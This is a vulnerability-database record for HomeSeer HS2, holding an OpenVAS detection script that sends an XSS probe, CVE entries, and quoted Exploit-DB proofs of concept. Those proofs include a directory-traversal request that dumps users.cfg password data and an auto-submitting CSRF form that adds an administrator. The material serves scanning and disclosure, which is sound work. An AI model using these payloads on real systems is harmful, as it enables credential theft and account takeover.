HomeSeer HS2 Web Interface Multiple Vulnerabilities
2011-12-20T00:00:00
ID OPENVAS:1361412562310902648 Type openvas Reporter Copyright (C) 2011 SecPod Modified 2020-05-08T00:00:00
Description
This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
#
# HomeSeer HS2 Web Interface Multiple Vulnerabilities
#
# Authors:
# Rachana Shetty <srachana@secpod.com>
#
# Copyright:
# Copyright (C) 2011 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Registration metadata. This branch runs only when `description` is set and
# ends with exit(0), so nothing in it touches the network.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.902648");
script_version("2020-05-08T08:34:44+0000");
# Three distinct flaws are attributed to this one VT. Per the CVE records quoted
# in the page's JSON: CVE-2011-4835 is directory traversal, CVE-2011-4836 is
# XSS and CVE-2011-4837 is CSRF. The active check further down exercises only
# the XSS; a positive result does not by itself demonstrate the other two.
script_cve_id("CVE-2011-4835", "CVE-2011-4836", "CVE-2011-4837");
script_bugtraq_id(50978);
# 7.5 with this vector is the CVSS v2 rating of the directory traversal
# (CVE-2011-4835). The XSS that is actually probed is rated 4.3 in the quoted
# CVE record, so the reported severity reflects the worst listed CVE rather
# than the verified one.
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)");
script_tag(name:"creation_date", value:"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)");
script_name("HomeSeer HS2 Web Interface Multiple Vulnerabilities");
script_xref(name:"URL", value:"http://secunia.com/advisories/47191/");
script_xref(name:"URL", value:"http://www.kb.cert.org/vuls/id/796883");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/71713");
script_tag(name:"qod_type", value:"remote_vul");
# ACT_ATTACK: the check sends a request whose path carries a script element
# instead of only reading a banner or version string.
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2011 SecPod");
script_family("Web application abuses");
# The script is scheduled after gb_get_http_banner.nasl and requires the
# HomeSeer/banner KB key; presumably that dependency sets the key when it sees
# a HomeSeer Server header (confirm against the dependency).
script_dependencies("gb_get_http_banner.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("HomeSeer/banner");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a vulnerable
site and gain sensitive information via directory traversal attacks.");
script_tag(name:"affected", value:"HomeSeer HS2 version 2.5.0.20.");
script_tag(name:"insight", value:"The flaws are due to improper validation of user-supplied input
passed via the URL, which allows attacker to conduct stored and reflective
xss by sending a crafted request with JavaScript to web interface and
causing the JavaScript to be stored in the log viewer page.");
# NOTE(review): the Exploit-DB entry quoted in the page's JSON (EDB-ID:18567)
# states that the elog XSS vector was fixed in the 2.5.0.49 update, while it
# still reports directory traversal and CSRF against 2.5.0.49. The
# "no known solution" wording and WillNotFix below should be re-checked against
# that: upgrading appears to address the XSS this VT detects, but not the other
# two listed CVEs.
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"This host is running HomeSeer HS2 and is prone to multiple
vulnerabilities.");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
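# Active check for the stored XSS in the HomeSeer HS2 log viewer (the URI-based
# XSS described in the "insight" tag). Only this issue is probed; the directory
# traversal and CSRF flaws listed in script_cve_id() are not exercised here.
port = http_get_port(default:80);
banner = http_get_remote_headers(port: port);

# Gate on the Server header so the probe is never sent to a host that does not
# identify itself as HomeSeer.
if(!banner || "Server: HomeSeer" >!< banner)
  exit(0);

# Step 1: request a path that carries a script element. The response to this
# request is not inspected, so it is not kept in a variable.
# NOTE(review): on a vulnerable host this marker presumably stays in the log
# viewer until the log is cleared; record that in the scan hand-over notes.
url = string("/stat<script>alert(document.cookie)</script>");
sndReq = http_get(item:url, port:port);
http_send_recv(port:port, data:sndReq);

# Step 2: the finding is confirmed only if the log viewer page returns the
# marker unescaped.
if(http_vuln_check(port:port, url:"/elog", pattern:"<script>alert\(document\.cookie\)</script>", check_header:TRUE)) {
  # Name both the request that planted the marker and the page that echoed it,
  # so the operator knows where the evidence was observed.
  report = http_report_vuln_url(port:port, url:url) + '\nThe injected script was returned unescaped by the log viewer page /elog.';
  security_message(port:port, data:report);
  exit(0);
}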
{"id": "OPENVAS:1361412562310902648", "type": "openvas", "bulletinFamily": "scanner", "title": "HomeSeer HS2 Web Interface Multiple Vulnerabilities", "description": "This host is running HomeSeer HS2 and is prone to multiple\n vulnerabilities.", "published": "2011-12-20T00:00:00", "modified": "2020-05-08T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902648", "reporter": "Copyright (C) 2011 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/71713", "http://secunia.com/advisories/47191/", "http://www.kb.cert.org/vuls/id/796883"], "cvelist": ["CVE-2011-4836", "CVE-2011-4835", "CVE-2011-4837"], "lastseen": "2020-05-12T17:32:52", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4835", "CVE-2011-4836", "CVE-2011-4837"]}, {"type": "openvas", "idList": ["OPENVAS:902648"]}, {"type": "exploitdb", "idList": ["EDB-ID:18567", "EDB-ID:36429"]}], "modified": "2020-05-12T17:32:52", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-05-12T17:32:52", "rev": 2}, "vulnersScore": 6.8}, "pluginID": "1361412562310902648", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HomeSeer HS2 Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902648\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2011-4835\", \"CVE-2011-4836\", \"CVE-2011-4837\");\n script_bugtraq_id(50978);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)\");\n script_name(\"HomeSeer HS2 Web Interface Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/47191/\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/796883\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/71713\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"HomeSeer/banner\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary\n HTML and script code in a user's browser session in the context of a vulnerable\n site and gain sensitive information via directory traversal attacks.\");\n\n script_tag(name:\"affected\", value:\"HomeSeer HS2 version 2.5.0.20.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to improper validation of user-supplied input\n passed via the URL, which 
allows attacker to conduct stored and reflective\n xss by sending a crafted request with JavaScript to web interface and\n causing the JavaScript to be stored in the log viewer page.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running HomeSeer HS2 and is prone to multiple\n vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port(default:80);\nbanner = http_get_remote_headers(port: port);\n\nif(!banner || \"Server: HomeSeer\" >!< banner)\n exit(0);\n\nurl = string(\"/stat<script>alert(document.cookie)</script>\");\nsndReq = http_get(item:url, port:port);\nrcvRes = http_send_recv(port:port, data:sndReq);\n\nif(http_vuln_check(port:port, url:\"/elog\", pattern:\"<script>alert\\(document\\.cookie\\)</script>\", check_header:TRUE)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n", "naslFamily": "Web application abuses", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:51:09", "description": "Cross-site request forgery (CSRF) vulnerability in /ctrl in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to hijack the authentication of admins for requests that execute arbitrary programs.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4837", "type": "cve", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4837"], "modified": "2011-12-15T05:00:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4837", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4837", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:09", "description": "Cross-site scripting (XSS) vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to inject arbitrary web script or HTML via a request for a crafted URI.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4836", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4836"], "modified": "2011-12-15T19:54:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4836", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4836", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:51:09", "description": "Directory traversal vulnerability in the web interface in HomeSeer HS2 2.5.0.20 allows remote attackers to access arbitrary files via unspecified vectors.", "edition": 4, "cvss3": {}, "published": "2011-12-15T03:57:00", "title": "CVE-2011-4835", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4835"], "modified": "2011-12-15T19:53:00", "cpe": ["cpe:/a:homeseer:homeseer_hs2:2.5.0.20"], "id": "CVE-2011-4835", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4835", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:homeseer:homeseer_hs2:2.5.0.20:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-09-04T14:19:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4836", "CVE-2011-4835", "CVE-2011-4837"], "description": "This host is running HomeSeer HS2 and is prone to multiple\nvulnerabilities.", "modified": "2017-08-28T00:00:00", "published": "2011-12-20T00:00:00", "id": "OPENVAS:902648", "href": 
"http://plugins.openvas.org/nasl.php?oid=902648", "type": "openvas", "title": "HomeSeer HS2 Web Interface Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_homeseer_hs2_web_interface_mult_vuln.nasl 7015 2017-08-28 11:51:24Z teissa $\n#\n# HomeSeer HS2 Web Interface Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary\nHTML and script code in a user's browser session in the context of a vulnerable\nsite and gain sensitive information via directory traversal attacks.\n\nImpact Level: Application\";\n\ntag_affected = \"HomeSeer HS2 version 2.5.0.20\";\n\ntag_insight = \"The flaws are due to improper validation of user-supplied input\npassed via the URL, which allows attacker to conduct stored and reflective\nxss by sending a crafted request with JavaScript to web interface and\ncausing the JavaScript to be stored in the log viewer page.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure 
of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host is running HomeSeer HS2 and is prone to multiple\nvulnerabilities.\";\n\nif(description)\n{\n script_id(902648);\n script_version(\"$Revision: 7015 $\");\n script_cve_id(\"CVE-2011-4835\", \"CVE-2011-4836\", \"CVE-2011-4837\");\n script_bugtraq_id(50978);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-20 15:01:39 +0530 (Tue, 20 Dec 2011)\");\n script_name(\"HomeSeer HS2 Web Interface Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/47191/\");\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/796883\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/71713\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"HomeSeer/banner\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n##\n## The script code starts here\n##\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP Port\nport = 
get_http_port(default:80);\nif(!port){\n exit(0);\n}\n\n## Check port status\nif(!get_port_state(port)){\n exit(0);\n}\n\n## Get the banner\nbanner = get_http_banner(port: port);\n\n## Confirm the application before trying exploit\nif(\"Server: HomeSeer\" >!< banner) {\n exit(0);\n}\n\n## Construct the attack request\nsndReq = http_get(item:string(\"/stat<script>alert(document.cookie)\" +\n \"</script>\"), port:port);\nrcvRes = http_send_recv(port:port, data:sndReq);\n\n## Confirm the exploit\nif(http_vuln_check(port:port, url:\"/elog\", pattern:\"<script>alert\\(\" +\n \"document.cookie\\)</script>\", check_header:TRUE))\n{\n security_message(port);\n exit(0);\n}\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T09:59:32", "description": "HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities. CVE-2011-4835,CVE-2011-4837. Webapps exploit for windows platform", "published": "2012-03-07T00:00:00", "type": "exploitdb", "title": "HomeSeer HS2 and HomeSeer PRO Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4835", "CVE-2011-4837"], "modified": "2012-03-07T00:00:00", "id": "EDB-ID:18567", "href": "https://www.exploit-db.com/exploits/18567/", "sourceData": "# HomeSeer Home Automation Software Multiple Web Vulnerabilities (0day)\r\n# Date: 3/6/12\r\n# Author: Silent_Dream\r\n# Software Link: http://www.homeseer.com/pub/setuphs2_5_0_49.exe\r\n# Version: 2.5.0.49\r\n# Tested on: Win XP\r\n# CERT VU#796883: http://www.kb.cert.org/vuls/id/796883\r\n#Note: This affects both HomeSeer HS2 and HomeSeer PRO. 
\r\n#Previously reported XSS attack vector (elog) reported to CERT was fixed in 2.5.0.49 update.\r\n\r\nA) Directory Traversal: Retrieving the users.cfg file which contains HomeSeer usernames, access levels, and encrypted passwords.\r\n\r\nncat 192.168.0.1 80\r\nGET /..\\Config\\users.cfg HTTP/1.0\r\n\r\nHTTP/1.0 200 OK\r\nServer: HomeSeer\r\nContent-Type: application/\r\nAccept-Ranges: bytes\r\nContent-Length: 195\r\n\r\n2\r\nEFBBBF6775657374,EFBBBF4853454E4332774B51364D614C53436D534D41697A48617450514D513\r\nD3D,EFBBBF31\r\nEFBBBF64656661756C74,EFBBBF4853454E43327A68336A307A412F585153776F7032575A54534E6\r\n3773D3D,EFBBBF36\r\n\r\nB) Cross-Site Request Forgery: It is possible to add a new admin user by tricking logged-in admin to visit a malicious URL.\r\nThis POC adds user \"hacker\" with pass \"hacked\" as a HomeSeer admin.\r\n\r\n <html>\r\n <body onload=\"javascript:document.forms[0].submit()\">\r\n <H2>HomeSeer CSRF Exploit to add new administrator account</H2>\r\n <form method=\"POST\" name=\"form0\" action=\"http://localhost/ctrl \">\r\n <input type=\"hidden\" name=\"wuNEWUSERNAME\" value=\"hacker\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERPASS\" value=\"hacked\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERRIGHTS\" value=\"Admin\"/>\r\n <input type=\"hidden\" name=\"wuNEWUSERADD\" value=\"Add\"/>\r\n <input type=\"hidden\" name=\"stay_on_webusers\" value=\"Hello\"/>\r\n </form>\r\n </body>\r\n </html>", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18567/"}, {"lastseen": "2016-02-04T03:29:35", "description": "HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS. CVE-2011-4836. 
Remote exploit for hardware platform", "published": "2011-12-08T00:00:00", "type": "exploitdb", "title": "HomeSeer HS2 2.5.0.20 Web Interface Log Viewer Page URI XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4836"], "modified": "2011-12-08T00:00:00", "id": "EDB-ID:36429", "href": "https://www.exploit-db.com/exploits/36429/", "sourceData": "source: http://www.securityfocus.com/bid/50978/info\r\n\r\nHS2 web interface is prone to multiple security vulnerabilities:\r\n\r\n1. An HTML-injection vulnerability.\r\n2. A cross-site request-forgery vulnerability.\r\n3. A directory-traversal vulnerability.\r\n\r\nAttackers can exploit these issues to perform certain actions in the context of an authorized user's session, run arbitrary HTML and script code, and transfer files outside of the web directory. Other attacks may also be possible.\r\n\r\nHomeSeer HS2 2.5.0.20 is vulnerable; prior versions may also be affected. \r\n\r\nhttp://www.example.com/example<script>alert(document.cookie)</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/36429/"}]}